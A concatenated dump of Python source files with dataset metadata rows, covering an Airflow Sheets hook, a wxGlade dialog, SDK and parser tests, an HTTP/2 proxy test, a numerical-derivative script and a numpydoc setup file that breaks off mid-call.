major_dimension: str = 'ROWS',
value_input_option: str = 'RAW',
include_values_in_response: bool = False,
value_render_option: str = 'FORMATTED_VALUE',
date_time_render_option: str = 'SERIAL_NUMBER'
) -> Dict:
if len(ranges) != len(values):
raise AirflowException(
"'Ranges' and and 'Lists' must be of equal length. \n \
'Ranges' is of length: {} and \n \
'Values' is of length: {}.".format(str(len(ranges)), str(len(values))))
service = self.get_conn()
data = []
for idx, range_ in enumerate(ranges):
value_range = {
"range": range_,
"majorDimension": major_dimension,
"values": values[idx]
}
data.append(value_range)
body = {
"valueInputOption": value_input_option,
"data": data,
"includeValuesInResponse": include_values_in_response,
"responseValueRenderOption": value_render_option,
"responseDateTimeRenderOption": date_time_render_option
}
response = service.spreadsheets().values().batchUpdate(
spreadsheetId=self.spreadsheet_id,
body=body
).execute(num_retries=self.num_retries)
return response
@CloudBaseHook.catch_http_exception
def append_values(
self,
range_: str,
values: List,
major_dimension: str = 'ROWS',
value_input_option: str = 'RAW',
insert_data_option: str = 'OVERWRITE',
include_values_in_response: bool = False,
value_render_option: str = 'FORMATTED_VALUE',
date_time_render_option: str = 'SERIAL_NUMBER'
) -> Dict:
service = self.get_conn()
body = {
"range": range_,
"majorDimension": major_dimension,
"values": values
}
response = service.spreadsheets().values().append(
spreadsheetId=self.spreadsheet_id,
range=range_,
valueInputOption=value_input_option,
insertDataOption=insert_data_option,
includeValuesInResponse=include_values_in_response,
responseValueRenderOption=value_render_option,
responseDateTimeRenderOption=date_time_render_option,
body=body
).execute(num_retries=self.num_retries)
return response
@CloudBaseHook.catch_http_exception
def clear(self, range_: str) -> Dict:
service = self.get_conn()
response = service.spreadsheets().values().clear(
spreadsheetId=self.spreadsheet_id,
range=range_
).execute(num_retries=self.num_retries)
return response
@CloudBaseHook.catch_http_exception
def batch_clear(self, ranges: List) -> Dict:
service = self.get_conn()
body = {
"ranges": ranges
}
response = service.spreadsheets().values().batchClear(
spreadsheetId=self.spreadsheet_id,
body=body
).execute(num_retries=self.num_retries)
return response
| true | true |
f73281be9ced4bbfcc2aa580105b37462d473a71 | 5,152 | py | Python | vespa/pulse/auto_gui/manage_pulse_designs.py | vespa-mrs/vespa | 6d3e84a206ec427ac1304e70c7fadf817432956b | [
"BSD-3-Clause"
] | null | null | null | vespa/pulse/auto_gui/manage_pulse_designs.py | vespa-mrs/vespa | 6d3e84a206ec427ac1304e70c7fadf817432956b | [
"BSD-3-Clause"
] | 4 | 2021-04-17T13:58:31.000Z | 2022-01-20T14:19:57.000Z | vespa/pulse/auto_gui/manage_pulse_designs.py | vespa-mrs/vespa | 6d3e84a206ec427ac1304e70c7fadf817432956b | [
"BSD-3-Clause"
] | 3 | 2021-06-05T16:34:57.000Z | 2022-01-19T16:13:22.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# generated by wxGlade 0.6.5 on Mon Jul 27 15:21:25 2015
import wx
# begin wxGlade: extracode
# end wxGlade
class MyDialog(wx.Dialog):
def __init__(self, *args, **kwds):
# begin wxGlade: MyDialog.__init__
kwds["style"] = kwds.get("style", 0) | wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER
wx.Dialog.__init__(self, *args, **kwds)
self.label_2 = wx.StaticText(self, wx.ID_ANY, "")
self.label_1 = wx.StaticText(self, wx.ID_ANY, "")
self.ButtonView = wx.Button(self, wx.ID_ANY, "&View...")
self.ButtonClone = wx.Button(self, wx.ID_ANY, "C&lone")
self.ButtonDelete = wx.Button(self, wx.ID_DELETE, "")
self.ListPulseDesigns = wx.ListCtrl(self, wx.ID_ANY, style=wx.BORDER_SUNKEN | wx.LC_REPORT)
self.ButtonImport = wx.Button(self, wx.ID_ANY, "&Import...")
self.ButtonExport = wx.Button(self, wx.ID_ANY, "E&xport...")
self.ButtonClose = wx.Button(self, wx.ID_CLOSE, "")
self.__set_properties()
self.__do_layout()
self.Bind(wx.EVT_BUTTON, self.on_view, self.ButtonView)
self.Bind(wx.EVT_BUTTON, self.on_clone, self.ButtonClone)
self.Bind(wx.EVT_BUTTON, self.on_delete, self.ButtonDelete)
self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.on_pulse_design_activated, self.ListPulseDesigns)
self.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.on_selection_changed, self.ListPulseDesigns)
self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.on_selection_changed, self.ListPulseDesigns)
self.Bind(wx.EVT_BUTTON, self.on_import, self.ButtonImport)
self.Bind(wx.EVT_BUTTON, self.on_export, self.ButtonExport)
self.Bind(wx.EVT_BUTTON, self.on_close, self.ButtonClose)
# end wxGlade
def __set_properties(self):
# begin wxGlade: MyDialog.__set_properties
self.SetTitle("Manage Pulse Designs")
# end wxGlade
def __do_layout(self):
# begin wxGlade: MyDialog.__do_layout
sizer_4 = wx.BoxSizer(wx.VERTICAL)
grid_sizer_1 = wx.FlexGridSizer(3, 2, 10, 0)
sizer_6 = wx.BoxSizer(wx.HORIZONTAL)
sizer_5 = wx.BoxSizer(wx.VERTICAL)
sizer_2 = wx.BoxSizer(wx.HORIZONTAL)
sizer_1 = wx.BoxSizer(wx.HORIZONTAL)
sizer_2_copy = wx.BoxSizer(wx.HORIZONTAL)
grid_sizer_1.Add((20, 20), 0, 0, 0)
sizer_2_copy.Add(self.label_2, 0, wx.ALIGN_CENTER_VERTICAL | wx.RIGHT, 5)
sizer_2_copy.Add((20, 20), 0, 0, 0)
sizer_2.Add(sizer_2_copy, 1, wx.EXPAND, 0)
sizer_1.Add(self.label_1, 0, wx.ALIGN_CENTER_VERTICAL | wx.LEFT | wx.RIGHT, 5)
sizer_1.Add((20, 20), 0, 0, 0)
sizer_2.Add(sizer_1, 1, wx.EXPAND, 0)
grid_sizer_1.Add(sizer_2, 1, wx.EXPAND, 0)
sizer_5.Add(self.ButtonView, 0, wx.TOP, 5)
sizer_5.Add(self.ButtonClone, 0, wx.TOP, 5)
sizer_5.Add(self.ButtonDelete, 0, wx.TOP, 30)
grid_sizer_1.Add(sizer_5, 0, wx.BOTTOM | wx.EXPAND | wx.LEFT | wx.RIGHT, 10)
grid_sizer_1.Add(self.ListPulseDesigns, 1, wx.EXPAND, 0)
grid_sizer_1.Add((20, 20), 0, 0, 0)
sizer_6.Add(self.ButtonImport, 0, 0, 0)
sizer_6.Add(self.ButtonExport, 0, wx.LEFT, 10)
sizer_6.Add((20, 20), 1, wx.EXPAND, 0)
sizer_6.Add(self.ButtonClose, 0, 0, 0)
grid_sizer_1.Add(sizer_6, 0, wx.BOTTOM | wx.EXPAND, 10)
grid_sizer_1.AddGrowableRow(1)
grid_sizer_1.AddGrowableCol(1)
sizer_4.Add(grid_sizer_1, 1, wx.ALL | wx.EXPAND, 10)
self.SetSizer(sizer_4)
sizer_4.Fit(self)
self.Layout()
# end wxGlade
def on_view(self, event): # wxGlade: MyDialog.<event_handler>
print("Event handler `on_view' not implemented!")
event.Skip()
def on_clone(self, event): # wxGlade: MyDialog.<event_handler>
print("Event handler `on_clone' not implemented!")
event.Skip()
def on_delete(self, event): # wxGlade: MyDialog.<event_handler>
print("Event handler `on_delete' not implemented!")
event.Skip()
def on_selection_changed(self, event): # wxGlade: MyDialog.<event_handler>
print("Event handler `on_selection_changed' not implemented!")
event.Skip()
def on_pulse_design_activated(self, event): # wxGlade: MyDialog.<event_handler>
print("Event handler `on_pulse_design_activated' not implemented!")
event.Skip()
def on_import(self, event): # wxGlade: MyDialog.<event_handler>
print("Event handler `on_import' not implemented!")
event.Skip()
def on_export(self, event): # wxGlade: MyDialog.<event_handler>
print("Event handler `on_export' not implemented!")
event.Skip()
def on_close(self, event): # wxGlade: MyDialog.<event_handler>
print("Event handler `on_close' not implemented!")
event.Skip()
# end of class MyDialog
if __name__ == "__main__":
app = wx.PySimpleApp(0)
wx.InitAllImageHandlers()
DialogManagePulseDesigns = MyDialog(None, -1, "")
app.SetTopWindow(DialogManagePulseDesigns)
DialogManagePulseDesigns.Show()
app.MainLoop()
| 42.578512 | 100 | 0.65528 |
import wx
class MyDialog(wx.Dialog):
def __init__(self, *args, **kwds):
kwds["style"] = kwds.get("style", 0) | wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER
wx.Dialog.__init__(self, *args, **kwds)
self.label_2 = wx.StaticText(self, wx.ID_ANY, "")
self.label_1 = wx.StaticText(self, wx.ID_ANY, "")
self.ButtonView = wx.Button(self, wx.ID_ANY, "&View...")
self.ButtonClone = wx.Button(self, wx.ID_ANY, "C&lone")
self.ButtonDelete = wx.Button(self, wx.ID_DELETE, "")
self.ListPulseDesigns = wx.ListCtrl(self, wx.ID_ANY, style=wx.BORDER_SUNKEN | wx.LC_REPORT)
self.ButtonImport = wx.Button(self, wx.ID_ANY, "&Import...")
self.ButtonExport = wx.Button(self, wx.ID_ANY, "E&xport...")
self.ButtonClose = wx.Button(self, wx.ID_CLOSE, "")
self.__set_properties()
self.__do_layout()
self.Bind(wx.EVT_BUTTON, self.on_view, self.ButtonView)
self.Bind(wx.EVT_BUTTON, self.on_clone, self.ButtonClone)
self.Bind(wx.EVT_BUTTON, self.on_delete, self.ButtonDelete)
self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.on_pulse_design_activated, self.ListPulseDesigns)
self.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.on_selection_changed, self.ListPulseDesigns)
self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.on_selection_changed, self.ListPulseDesigns)
self.Bind(wx.EVT_BUTTON, self.on_import, self.ButtonImport)
self.Bind(wx.EVT_BUTTON, self.on_export, self.ButtonExport)
self.Bind(wx.EVT_BUTTON, self.on_close, self.ButtonClose)
def __set_properties(self):
self.SetTitle("Manage Pulse Designs")
def __do_layout(self):
sizer_4 = wx.BoxSizer(wx.VERTICAL)
grid_sizer_1 = wx.FlexGridSizer(3, 2, 10, 0)
sizer_6 = wx.BoxSizer(wx.HORIZONTAL)
sizer_5 = wx.BoxSizer(wx.VERTICAL)
sizer_2 = wx.BoxSizer(wx.HORIZONTAL)
sizer_1 = wx.BoxSizer(wx.HORIZONTAL)
sizer_2_copy = wx.BoxSizer(wx.HORIZONTAL)
grid_sizer_1.Add((20, 20), 0, 0, 0)
sizer_2_copy.Add(self.label_2, 0, wx.ALIGN_CENTER_VERTICAL | wx.RIGHT, 5)
sizer_2_copy.Add((20, 20), 0, 0, 0)
sizer_2.Add(sizer_2_copy, 1, wx.EXPAND, 0)
sizer_1.Add(self.label_1, 0, wx.ALIGN_CENTER_VERTICAL | wx.LEFT | wx.RIGHT, 5)
sizer_1.Add((20, 20), 0, 0, 0)
sizer_2.Add(sizer_1, 1, wx.EXPAND, 0)
grid_sizer_1.Add(sizer_2, 1, wx.EXPAND, 0)
sizer_5.Add(self.ButtonView, 0, wx.TOP, 5)
sizer_5.Add(self.ButtonClone, 0, wx.TOP, 5)
sizer_5.Add(self.ButtonDelete, 0, wx.TOP, 30)
grid_sizer_1.Add(sizer_5, 0, wx.BOTTOM | wx.EXPAND | wx.LEFT | wx.RIGHT, 10)
grid_sizer_1.Add(self.ListPulseDesigns, 1, wx.EXPAND, 0)
grid_sizer_1.Add((20, 20), 0, 0, 0)
sizer_6.Add(self.ButtonImport, 0, 0, 0)
sizer_6.Add(self.ButtonExport, 0, wx.LEFT, 10)
sizer_6.Add((20, 20), 1, wx.EXPAND, 0)
sizer_6.Add(self.ButtonClose, 0, 0, 0)
grid_sizer_1.Add(sizer_6, 0, wx.BOTTOM | wx.EXPAND, 10)
grid_sizer_1.AddGrowableRow(1)
grid_sizer_1.AddGrowableCol(1)
sizer_4.Add(grid_sizer_1, 1, wx.ALL | wx.EXPAND, 10)
self.SetSizer(sizer_4)
sizer_4.Fit(self)
self.Layout()
def on_view(self, event):
print("Event handler `on_view' not implemented!")
event.Skip()
def on_clone(self, event): # wxGlade: MyDialog.<event_handler>
print("Event handler `on_clone' not implemented!")
event.Skip()
def on_delete(self, event):
print("Event handler `on_delete' not implemented!")
event.Skip()
def on_selection_changed(self, event): # wxGlade: MyDialog.<event_handler>
print("Event handler `on_selection_changed' not implemented!")
event.Skip()
def on_pulse_design_activated(self, event):
print("Event handler `on_pulse_design_activated' not implemented!")
event.Skip()
def on_import(self, event): # wxGlade: MyDialog.<event_handler>
print("Event handler `on_import' not implemented!")
event.Skip()
def on_export(self, event):
print("Event handler `on_export' not implemented!")
event.Skip()
def on_close(self, event): # wxGlade: MyDialog.<event_handler>
print("Event handler `on_close' not implemented!")
event.Skip()
if __name__ == "__main__":
app = wx.PySimpleApp(0)
wx.InitAllImageHandlers()
DialogManagePulseDesigns = MyDialog(None, -1, "")
app.SetTopWindow(DialogManagePulseDesigns)
DialogManagePulseDesigns.Show()
app.MainLoop()
| true | true |
f73281d82427249aef51b7db781136ffb89a9860 | 1,042 | py | Python | isi_sdk_8_1_1/test/test_providers_summary_provider_instance.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 24 | 2018-06-22T14:13:23.000Z | 2022-03-23T01:21:26.000Z | isi_sdk_8_1_1/test/test_providers_summary_provider_instance.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 46 | 2018-04-30T13:28:22.000Z | 2022-03-21T21:11:07.000Z | isi_sdk_8_1_1/test/test_providers_summary_provider_instance.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 29 | 2018-06-19T00:14:04.000Z | 2022-02-08T17:51:19.000Z | # coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 6
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_1_1
from isi_sdk_8_1_1.models.providers_summary_provider_instance import ProvidersSummaryProviderInstance # noqa: E501
from isi_sdk_8_1_1.rest import ApiException
class TestProvidersSummaryProviderInstance(unittest.TestCase):
"""ProvidersSummaryProviderInstance unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testProvidersSummaryProviderInstance(self):
"""Test ProvidersSummaryProviderInstance"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_8_1_1.models.providers_summary_provider_instance.ProvidersSummaryProviderInstance() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 25.414634 | 123 | 0.744722 |
from __future__ import absolute_import
import unittest
import isi_sdk_8_1_1
from isi_sdk_8_1_1.models.providers_summary_provider_instance import ProvidersSummaryProviderInstance
from isi_sdk_8_1_1.rest import ApiException
class TestProvidersSummaryProviderInstance(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testProvidersSummaryProviderInstance(self):
s
if __name__ == '__main__':
unittest.main()
| true | true |
f732826458cc6b350d8bd7d018b41884c4e3e17e | 50 | py | Python | ineuron/Python_Assignment_2/reverse.py | niraj-kale/ineuron | f1ee3df4e666b0579a6aaec409c0557650c338da | [
"MIT"
] | null | null | null | ineuron/Python_Assignment_2/reverse.py | niraj-kale/ineuron | f1ee3df4e666b0579a6aaec409c0557650c338da | [
"MIT"
] | null | null | null | ineuron/Python_Assignment_2/reverse.py | niraj-kale/ineuron | f1ee3df4e666b0579a6aaec409c0557650c338da | [
"MIT"
] | null | null | null | word = input("Input a word : ")
print(word[::-1]) | 16.666667 | 31 | 0.58 | word = input("Input a word : ")
print(word[::-1]) | true | true |
f73283321fed4349be2b954e61d0cbe802264e78 | 3,075 | py | Python | cellpack/mgl_tools/mglutil/web/Tests/test_htmlparser.py | mesoscope/cellpack | ec6b736fc706c1fae16392befa814b5337a3a692 | [
"MIT"
] | null | null | null | cellpack/mgl_tools/mglutil/web/Tests/test_htmlparser.py | mesoscope/cellpack | ec6b736fc706c1fae16392befa814b5337a3a692 | [
"MIT"
] | 21 | 2021-10-02T00:07:05.000Z | 2022-03-30T00:02:10.000Z | cellpack/mgl_tools/mglutil/web/Tests/test_htmlparser.py | mesoscope/cellpack | ec6b736fc706c1fae16392befa814b5337a3a692 | [
"MIT"
] | null | null | null | #########################################################################
#
# Date: Nov. 2002 Author: Daniel Stoffler
#
# Copyright: Daniel Stoffler and TSRI
#
#########################################################################
import sys
from mglutil.regression import testplus
from mglutil.web import HTMLParser
from time import sleep
def pause(sleepTime=0.4):
ed.master.update()
sleep(sleepTime)
def test_ParseCGIForms():
f = open("Data/testfile.html", "r")
txt = f.readlines()
P = HTMLParser.ParseHTML(mode="forms")
forms = P.parse(txt)
f.close()
# we have 4 forms in this testfile (INPUT)
assert len(forms) == 4
# FORM 0:
# form 0 has a text entry and a sumbit button (INPUT)
assert len(list(forms[0].input.keys())) == 2
# form 0 has no name, the parser should set the name to 'form_0'
assert forms[0].name == "form_0"
# the method of form 0 is 'post'
assert forms[0].method == "post"
# the action of form 0 is http://hoohoo.ncsa.uiuc.edu/cgi-bin/post-query
assert forms[0].action == "http://hoohoo.ncsa.uiuc.edu/cgi-bin/post-query"
# testing the inputs:
assert forms[0].input["input_0"]["type"] == "submit"
assert forms[0].input["input_0"]["value"] == "Submit Query"
##########################################################################
# FORM 1
# form[1] has 2 text entry, 3 checkbuttons, 7 radiobuttons, 1 submit button
assert len(list(forms[1].input.keys())) == 3 # 2 text entries, 1 submit button
assert len(list(forms[1].radiobutton.items())) == 2 # 2 categories
assert len(forms[1].radiobutton["paymethod"]) == 5
assert len(forms[1].radiobutton["callfirst"]) == 2 # 5 + 2 = 7
assert len(list(forms[1].checkbutton.items())) == 1 # 1 category
assert len(forms[1].checkbutton["topping"]) == 3 # 3 buttons
##########################################################################
# FORM 2
# form[2] has 2 comboboxes (SELECT) and 2 buttons (INPUT)
assert len(list(forms[2].select.keys())) == 2
assert len(list(forms[2].input.keys())) == 2
# testing comboboxes:
assert len(forms[2].select["what-to-do"]["options"]) == 5
assert forms[2].select["what-to-do"]["options"][0] == "Drink Coffee"
assert len(forms[2].select["who-to-do-it-with"]["options"]) == 6
assert forms[2].select["who-to-do-it-with"]["options"][-1] == "Chouck"
##########################################################################
# FORM 3
# form[3] has 3 textareas (TEXTAREA) and 2 buttons (INPUT)
print(forms[3].textarea)
assert len(list(forms[3].textarea.items())) == 3
assert len(forms[3].input) == 2
# testing textareas:
assert forms[3].textarea["positive"]["cols"] == "60"
assert forms[3].textarea["positive"]["rows"] == "20"
assert forms[3].textarea["username"]["text"][0] == "Your Name Here"
harness = testplus.TestHarness(
__name__,
funs=testplus.testcollect(globals()),
)
if __name__ == "__main__":
print(harness)
sys.exit(len(harness))
| 34.550562 | 83 | 0.556748 | true | true | |
f73283969bf30cb0fc5192375960b26d761e5a1f | 3,088 | py | Python | release/stubs.min/System/Windows/Forms/__init___parts/TableLayoutCellPaintEventHandler.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/System/Windows/Forms/__init___parts/TableLayoutCellPaintEventHandler.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/System/Windows/Forms/__init___parts/TableLayoutCellPaintEventHandler.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | class TableLayoutCellPaintEventHandler(MulticastDelegate, ICloneable, ISerializable):
"""
Represents the method that will handle the System.Windows.Forms.TableLayoutPanel.CellPaint event.
TableLayoutCellPaintEventHandler(object: object,method: IntPtr)
"""
def BeginInvoke(self, sender, e, callback, object):
""" BeginInvoke(self: TableLayoutCellPaintEventHandler,sender: object,e: TableLayoutCellPaintEventArgs,callback: AsyncCallback,object: object) -> IAsyncResult """
pass
def CombineImpl(self, *args):
"""
CombineImpl(self: MulticastDelegate,follow: Delegate) -> Delegate
Combines this System.Delegate with the specified System.Delegate to form a new delegate.
follow: The delegate to combine with this delegate.
Returns: A delegate that is the new root of the System.MulticastDelegate invocation list.
"""
pass
def DynamicInvokeImpl(self, *args):
"""
DynamicInvokeImpl(self: Delegate,args: Array[object]) -> object
Dynamically invokes (late-bound) the method represented by the current delegate.
args: An array of objects that are the arguments to pass to the method represented by the current
delegate.-or- null,if the method represented by the current delegate does not require
arguments.
Returns: The object returned by the method represented by the delegate.
"""
pass
def EndInvoke(self, result):
""" EndInvoke(self: TableLayoutCellPaintEventHandler,result: IAsyncResult) """
pass
def GetMethodImpl(self, *args):
"""
GetMethodImpl(self: MulticastDelegate) -> MethodInfo
Returns a static method represented by the current System.MulticastDelegate.
Returns: A static method represented by the current System.MulticastDelegate.
"""
pass
def Invoke(self, sender, e):
""" Invoke(self: TableLayoutCellPaintEventHandler,sender: object,e: TableLayoutCellPaintEventArgs) """
pass
def RemoveImpl(self, *args):
"""
RemoveImpl(self: MulticastDelegate,value: Delegate) -> Delegate
Removes an element from the invocation list of this System.MulticastDelegate that is equal to
the specified delegate.
value: The delegate to search for in the invocation list.
Returns: If value is found in the invocation list for this instance,then a new System.Delegate without
value in its invocation list; otherwise,this instance with its original invocation list.
"""
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod
def __new__(self, object, method):
""" __new__(cls: type,object: object,method: IntPtr) """
pass
def __reduce_ex__(self, *args):
pass
| 29.409524 | 221 | 0.680376 | class TableLayoutCellPaintEventHandler(MulticastDelegate, ICloneable, ISerializable):
def BeginInvoke(self, sender, e, callback, object):
pass
def CombineImpl(self, *args):
pass
def DynamicInvokeImpl(self, *args):
pass
def EndInvoke(self, result):
pass
def GetMethodImpl(self, *args):
pass
def Invoke(self, sender, e):
pass
def RemoveImpl(self, *args):
pass
def __init__(self, *args):
pass
@staticmethod
def __new__(self, object, method):
pass
def __reduce_ex__(self, *args):
pass
| true | true |
f73283aa4b808065d101ef22fa6cf7432a504266 | 1,531 | py | Python | test/autests/gold_tests/http2/http2.test.py | dragon512/proxy-verifier | d48d680bb5a2540af3c2cdc2968a4c1bef7546e1 | [
"Apache-2.0"
] | null | null | null | test/autests/gold_tests/http2/http2.test.py | dragon512/proxy-verifier | d48d680bb5a2540af3c2cdc2968a4c1bef7546e1 | [
"Apache-2.0"
] | null | null | null | test/autests/gold_tests/http2/http2.test.py | dragon512/proxy-verifier | d48d680bb5a2540af3c2cdc2968a4c1bef7546e1 | [
"Apache-2.0"
] | null | null | null | '''
Verify basic HTTP/2 functionality.
'''
# @file
#
# Copyright 2020, Verizon Media
# SPDX-License-Identifier: Apache-2.0
#
Test.Summary = '''
Verify basic HTTP/2 functionality.
'''
#
# Test 1: Verify correct behavior of a single HTTP/2 transaction.
#
r = Test.AddTestRun("Verify HTTP/2 processing of a single HTTP transaction")
client = r.AddClientProcess("client1", "replay_files/single_transaction",
https_ports=[4443], other_args="--verbose diag")
server = r.AddServerProcess("server1", "replay_files/single_transaction",
https_ports=[4444], other_args="--verbose diag")
proxy = r.AddProxyProcess("proxy1", listen_port=4443, server_port=4444,
use_ssl=True, use_http2_to_1=True)
if Condition.IsPlatform("darwin"):
proxy.Streams.stdout = "gold/single_transaction_proxy.gold_macos"
client.Streams.stdout = "gold/single_transaction_client.gold_macos"
server.Streams.stdout = "gold/single_transaction_server.gold_macos"
else:
proxy.Streams.stdout = "gold/single_transaction_proxy.gold"
client.Streams.stdout = "gold/single_transaction_client.gold"
server.Streams.stdout = "gold/single_transaction_server.gold"
client.Streams.stdout += Testers.ExcludesExpression(
"Violation:",
"There should be no verification errors because there are none added.")
server.Streams.stdout += Testers.ExcludesExpression(
"Violation:",
"There should be no verification errors because there are none added.")
| 37.341463 | 79 | 0.713912 |
Test.Summary = '''
Verify basic HTTP/2 functionality.
'''
r = Test.AddTestRun("Verify HTTP/2 processing of a single HTTP transaction")
client = r.AddClientProcess("client1", "replay_files/single_transaction",
https_ports=[4443], other_args="--verbose diag")
server = r.AddServerProcess("server1", "replay_files/single_transaction",
https_ports=[4444], other_args="--verbose diag")
proxy = r.AddProxyProcess("proxy1", listen_port=4443, server_port=4444,
use_ssl=True, use_http2_to_1=True)
if Condition.IsPlatform("darwin"):
proxy.Streams.stdout = "gold/single_transaction_proxy.gold_macos"
client.Streams.stdout = "gold/single_transaction_client.gold_macos"
server.Streams.stdout = "gold/single_transaction_server.gold_macos"
else:
proxy.Streams.stdout = "gold/single_transaction_proxy.gold"
client.Streams.stdout = "gold/single_transaction_client.gold"
server.Streams.stdout = "gold/single_transaction_server.gold"
client.Streams.stdout += Testers.ExcludesExpression(
"Violation:",
"There should be no verification errors because there are none added.")
server.Streams.stdout += Testers.ExcludesExpression(
"Violation:",
"There should be no verification errors because there are none added.")
| true | true |
f73284f572868ccb38a791c5403e5082b6b22e6b | 1,386 | py | Python | 17abriledp.py | mecanimatico/codigo_edp | 42080a4eb0f604873f9743ff0d0b8afde0735181 | [
"MIT"
] | null | null | null | 17abriledp.py | mecanimatico/codigo_edp | 42080a4eb0f604873f9743ff0d0b8afde0735181 | [
"MIT"
] | null | null | null | 17abriledp.py | mecanimatico/codigo_edp | 42080a4eb0f604873f9743ff0d0b8afde0735181 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Apr 17 09:57:12 2020
@author: Heber
"""
import numpy as np
import pandas as pd
import os
import matplotlib.pyplot as plt
#%% valor exacto d ela derivada
up = np.cos(1.0)
h = 0.1
up_aprox = (np.sin(1+h)-np.sin(1))/h
error = up - up_aprox
print ("Valor aproximado: ",up_aprox)
print ("Valor del error: ",error)
#%%-----------------------------
# muestra
list = [0.1, 0.01, 0.001, 0.0001, 0.00001]
aprox_values = []
errores_values = []
# aproximacion a la segunda derivada
errores_values2 = []
aprox_values2 = []
for h in list:
aux = (np.sin(1+h) - np.sin(1))/h
aprox_values.append(aux)
errores_values.append(up - aux)
# print(h, up_aprox,error)
# formula de segundo orden
aux_2 = (np.sin(1+h)-np.sin(1-h))/(2*h)
aprox_values2.append(aux_2)
errores_values2.append(up - aux_2)
plt.loglog(list,errores_values,'o-',list,errores_values2,'o-')
plt.grid(True)
#%%---------------------
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
list = [0.1, 0.01, 0.001, 0.0001]
valor_exacto = 6*np.exp(1.0)
valor_aprox = []
valor_error = []
for h in list:
aux = (np.exp((1+h)**2)-2*np.exp(1.0) + np.exp((1-h)**2))/h**2
valor_aprox.append(aux)
aux2 = abs(valor_exacto - aux)
valor_error.append(aux2)
plt.grid(True)
plt.loglog(list,valor_error,'o-')
#list,valor_aprox, 'o-'
| 21.323077 | 66 | 0.626984 |
import numpy as np
import pandas as pd
import os
import matplotlib.pyplot as plt
up = np.cos(1.0)
h = 0.1
up_aprox = (np.sin(1+h)-np.sin(1))/h
error = up - up_aprox
print ("Valor aproximado: ",up_aprox)
print ("Valor del error: ",error)
list = [0.1, 0.01, 0.001, 0.0001, 0.00001]
aprox_values = []
errores_values = []
errores_values2 = []
aprox_values2 = []
for h in list:
aux = (np.sin(1+h) - np.sin(1))/h
aprox_values.append(aux)
errores_values.append(up - aux)
aux_2 = (np.sin(1+h)-np.sin(1-h))/(2*h)
aprox_values2.append(aux_2)
errores_values2.append(up - aux_2)
plt.loglog(list,errores_values,'o-',list,errores_values2,'o-')
plt.grid(True)
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
list = [0.1, 0.01, 0.001, 0.0001]
valor_exacto = 6*np.exp(1.0)
valor_aprox = []
valor_error = []
for h in list:
aux = (np.exp((1+h)**2)-2*np.exp(1.0) + np.exp((1-h)**2))/h**2
valor_aprox.append(aux)
aux2 = abs(valor_exacto - aux)
valor_error.append(aux2)
plt.grid(True)
plt.loglog(list,valor_error,'o-')
| true | true |
f73287eee23516b86d7a58a9027c13d6bae3f980 | 993 | py | Python | doc/sphinxext/setup.py | celiafish/scikit-xray | 660a37821d58544b6443c5b8cd9c96daef577ed2 | [
"BSD-3-Clause"
] | 71 | 2016-01-04T22:32:27.000Z | 2022-03-25T07:57:54.000Z | doc/sphinxext/setup.py | celiafish/scikit-xray | 660a37821d58544b6443c5b8cd9c96daef577ed2 | [
"BSD-3-Clause"
] | 288 | 2015-12-09T23:40:31.000Z | 2021-02-02T00:32:00.000Z | doc/sphinxext/setup.py | celiafish/scikit-xray | 660a37821d58544b6443c5b8cd9c96daef577ed2 | [
"BSD-3-Clause"
] | 53 | 2015-12-10T14:35:17.000Z | 2021-06-24T13:36:00.000Z | from distutils.core import setup
import setuptools
import sys
import os
version = "0.3.dev"
setup(
name="numpydoc",
packages=["numpydoc"],
package_dir={"numpydoc": ""},
version=version,
description="Sphinx extension to support docstrings in Numpy format",
# classifiers from http://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=["Development Status :: 3 - Alpha",
"Environment :: Plugins",
"License :: OSI Approved :: BSD License",
"Topic :: Documentation"],
keywords="sphinx numpy",
author="Pauli Virtanen and others",
author_email="pav@iki.fi",
url="http://projects.scipy.org/numpy/browser/trunk/doc/sphinxext",
license="BSD",
zip_safe=False,
install_requires=["Sphinx >= 0.5"],
package_data={'numpydoc': 'tests', '': ''},
entry_points={
"console_scripts": [
"autosummary_generate = numpydoc.autosummary_generate:main",
],
},
)
| 30.090909 | 77 | 0.629406 | from distutils.core import setup
import setuptools
import sys
import os
version = "0.3.dev"
setup(
name="numpydoc",
packages=["numpydoc"],
package_dir={"numpydoc": ""},
version=version,
description="Sphinx extension to support docstrings in Numpy format",
classifiers=["Development Status :: 3 - Alpha",
"Environment :: Plugins",
"License :: OSI Approved :: BSD License",
"Topic :: Documentation"],
keywords="sphinx numpy",
author="Pauli Virtanen and others",
author_email="pav@iki.fi",
